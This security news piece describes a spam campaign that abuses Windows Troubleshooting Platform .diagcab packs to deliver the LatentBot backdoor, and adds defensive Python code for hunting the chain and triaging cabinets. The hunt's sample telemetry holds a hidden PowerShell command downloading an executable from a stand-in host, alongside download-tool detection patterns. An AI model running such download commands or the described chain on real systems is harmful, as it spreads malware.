Proofpoint researchers identified a recent spam campaign in which attackers abused the Windows Troubleshooting Platform (WTP) to spread malware.
Windows Troubleshooting Platform Is the Latest Exploit Nirvana
Security researchers at Proofpoint identified a new infection tactic in a recent spam campaign: abuse of the Windows Troubleshooting Platform (WTP). The Windows Troubleshooting Platform is a Windows service that lets software vendors and system administrators automate troubleshooting and repair operations by packaging them as troubleshooting packs.
The spam campaign delivered malicious Microsoft Word documents. When a victim opens one, the document shows a page of random characters with a warning overlaid on top that reads “Document has incorrect encoding: ‘UTF-8’ Double click to auto detect charset”. The warning is actually an embedded OLE object; double-clicking it launches a DIAGCAB file, the package format used by the Windows Troubleshooting Platform. The troubleshooting pack runs a PowerShell script that downloads the malware payload. Such OLE objects can be embedded anywhere in an Office document.
The method is interesting because it bypasses the detection techniques used by many security products. The malicious activity is carried out by msdt.exe, the Microsoft-signed diagnostic tool that loads the DIAGCAB file, so the suspicious behaviour originates from a trusted Windows component rather than from the document itself. According to the researchers, this is one more indication that malware developers continue to invent new infection techniques.
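A process-creation hunt for the chain described above, as an added example (it is not Proofpoint's code nor part of the original article). It models events on the Image, CommandLine and ParentImage fields of Sysmon Event ID 1 or a comparable EDR record; the sample events are constructed for this example, and the execution path it assumes is Word spawning msdt.exe, msdt.exe handing the pack to sdiagnhost.exe (the Scripted Diagnostics Native Host), and sdiagnhost.exe running the pack's PowerShell. The `/cab` switch on the msdt.exe command line is taken from the tool's documented usage; the rules key on the `.diagcab` path rather than the switch, so they still fire if a different switch is used.

```python
"""
Hunt for Windows Troubleshooting Platform (.diagcab) abuse in process-creation
telemetry.  Added example; not code from Proofpoint or the original article.

Events carry Image, CommandLine and ParentImage as in Sysmon Event ID 1.  The
assumed chain is winword.exe -> msdt.exe, then sdiagnhost.exe -> powershell.exe
for the scripts inside the pack.  All sample events below are constructed.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WTP_HOSTS = {"msdt.exe", "sdiagnhost.exe"}
# Command-line fragments typical of a PowerShell download stage.
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient"
    r"|bitsadmin|start-bitstransfer", re.IGNORECASE)
# Packs shipped with Windows live under the Windows directory; a .diagcab
# loaded from a user-writable location (Temp, Downloads, ...) is suspicious.
TRUSTED_PACK_DIR = re.compile(r"^[a-z]:\\windows\\", re.IGNORECASE)
DIAGCAB_ARG = re.compile(r'(?P<path>[a-z]:\\[^"]*?\.diagcab)', re.IGNORECASE)


@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str


def _base(path: str) -> str:
    # ntpath handles backslash paths on any host OS.
    return ntpath.basename(path).lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits = []
    img, parent = _base(ev.image), _base(ev.parent_image)
    if img == "msdt.exe" and parent in OFFICE_APPS:
        hits.append("office_spawns_msdt")
    if img == "msdt.exe":
        m = DIAGCAB_ARG.search(ev.command_line)
        if m and not TRUSTED_PACK_DIR.match(m.group("path")):
            hits.append("diagcab_from_untrusted_path")
    if img in {"powershell.exe", "pwsh.exe"} and parent in WTP_HOSTS:
        hits.append("wtp_host_spawns_powershell")
        if DOWNLOAD_HINTS.search(ev.command_line):
            hits.append("wtp_powershell_downloader")
    return hits


def hunt(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Pair each matching event's index with its rule hits; benign events are dropped."""
    results = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry: one malicious chain plus two benign events.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" /n invoice.docx', r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\msdt.exe",
              r'"C:\Windows\System32\msdt.exe" /cab "C:\Users\bob\AppData\Local\Temp\encoding.diagcab"',
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\sdiagnhost.exe",
              r'"C:\Windows\System32\sdiagnhost.exe" -Embedding', r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/p.exe','p.exe')\"",
              r"C:\Windows\System32\sdiagnhost.exe"),
    # Benign: a built-in pack launched from Control Panel.
    ProcEvent(r"C:\Windows\System32\msdt.exe",
              r'"C:\Windows\System32\msdt.exe" /cab "C:\Windows\diagnostics\system\Networking\NetworkDiagnostics.diagcab"',
              r"C:\Windows\System32\control.exe"),
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {_base(ev.parent_image)} -> {_base(ev.image)}: {', '.join(hits)}")
```

The path rule is deliberately separate from the parent rule: an attacker who finds another way to launch msdt.exe still has to point it at a pack stored somewhere writable, so the location check keeps firing when the process tree is less obvious.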
The payload is a modular backdoor known as LatentBot. It comprises several components: the main bot engine, a remote-access plugin, a reporting function, security-product detection capabilities and a hidden VNC instance.
As the trick relies mostly on social engineering, security-aware users will probably evade the malware easily. Functionally there is no major difference between a macro and the PowerShell troubleshooting scripts run by the Windows Troubleshooting Platform. However, most security software does not inspect WTP packages or scan the scripts inside them for threats.
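Because a DIAGCAB is a Microsoft Cabinet archive, the scripts the paragraph above says scanners overlook can be inventoried without extracting the pack. The following is an added example (not Proofpoint's or the article's code) that reads only the CFHEADER and CFFILE directory records laid out in the MS-CAB specification and reports the members that carry or declare executable logic; it does not decompress CFDATA blocks. The sample pack is a directory-only stub constructed in the block for illustration, not a loadable troubleshooting pack, and its member names (diagpkg.xml, TS_/RS_ scripts) follow the troubleshooting-pack naming convention.

```python
"""
List the members of a .diagcab (Microsoft Cabinet) without extracting it and
flag the troubleshooting-pack entries worth reading.  Added example; not code
from Proofpoint or the article.  Parses CFHEADER and CFFILE only (MS-CAB
layout); CFDATA blocks are not decompressed, so a damaged payload cannot
crash the triage step.
"""
import struct
from typing import List, Tuple

# CFHEADER fixed part (36 bytes): signature, reserved1, cbCabinet, reserved2,
# coffFiles, reserved3, versionMinor, versionMajor, cFolders, cFiles, flags,
# setID, iCabinet.
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")
# CFFILE fixed part (16 bytes): cbFile, uoffFolderStart, iFolder, date, time,
# attribs; a NUL-terminated name follows.
CFFILE = struct.Struct("<IIHHHH")
ATTR_NAME_IS_UTF = 0x80
# Members that contain or declare the pack's logic: the diagpkg.xml manifest
# and the TS_ (troubleshooter), RS_ (resolver) and VF_ (verifier) scripts.
INTERESTING = (".ps1", ".xml")


def list_cab(data: bytes) -> List[Tuple[str, int]]:
    """Return [(name, size), ...] for every CFFILE record in the cabinet."""
    if len(data) < CFHEADER.size:
        raise ValueError("too short for a CFHEADER")
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, ver_minor, ver_major,
     c_folders, c_files, _flags, _set_id, _i_cabinet) = CFHEADER.unpack_from(data, 0)
    if sig != b"MSCF":
        raise ValueError("not a Microsoft Cabinet file")
    if (ver_major, ver_minor) != (1, 3):
        raise ValueError(f"unsupported CAB version {ver_major}.{ver_minor}")
    if cb_cabinet > len(data):
        raise ValueError("cbCabinet exceeds data length (truncated file)")
    # coffFiles points straight at the first CFFILE, so the optional reserve
    # area and CFFOLDER records can be skipped for a listing.
    pos = coff_files
    entries = []
    for _ in range(c_files):
        if pos + CFFILE.size > len(data):
            raise ValueError("CFFILE record runs past end of data")
        cb_file, _uoff, i_folder, _date, _time, attribs = CFFILE.unpack_from(data, pos)
        pos += CFFILE.size
        end = data.find(b"\x00", pos)
        if end < 0:
            raise ValueError("unterminated CFFILE name")
        name = data[pos:end].decode(
            "utf-8" if attribs & ATTR_NAME_IS_UTF else "cp437", errors="replace")
        # 0xFFFD-0xFFFF mark files continued from/into a neighbouring cabinet.
        if not (i_folder < c_folders or i_folder >= 0xFFFD):
            raise ValueError(f"{name!r} references folder {i_folder} of {c_folders}")
        entries.append((name, cb_file))
        pos = end + 1
    return entries


def triage(data: bytes) -> List[str]:
    """Names of pack members that contain or declare executable logic."""
    return [n for n, _ in list_cab(data) if n.lower().endswith(INTERESTING)]


def build_stub_cab(files: List[Tuple[str, int]]) -> bytes:
    """Constructed test fixture: a directory-only cabinet with one empty folder
    and no CFDATA.  Valid for listing, not a loadable troubleshooting pack."""
    folder = struct.pack("<IHH", 0, 0, 0)          # coffCabStart, cCFData, typeCompress=none
    coff_files = CFHEADER.size + len(folder)
    body = b""
    for name, size in files:
        body += CFFILE.pack(size, 0, 0, 0, 0, 0x20) + name.encode("ascii") + b"\x00"
    total = coff_files + len(body)
    header = CFHEADER.pack(b"MSCF", 0, total, 0, coff_files, 0,
                           3, 1, 1, len(files), 0, 0x1234, 0)
    return header + folder + body


# Constructed sample: the members a small troubleshooting pack would carry.
SAMPLE_PACK = build_stub_cab([
    ("diagpkg.xml", 2310),
    ("TS_Encoding.ps1", 880),
    ("RS_FixEncoding.ps1", 1420),
    ("en-US\\DiagPackage.dll.mui", 4096),
])

if __name__ == "__main__":
    for name, size in list_cab(SAMPLE_PACK):
        print(f"{size:>8}  {name}")
    print("review:", ", ".join(triage(SAMPLE_PACK)))
```

On a real sample the next step is to expand the flagged members and read the TS_ and RS_ scripts themselves; a pack whose troubleshooter reaches out to the network or writes executables is not fixing anyone's character encoding.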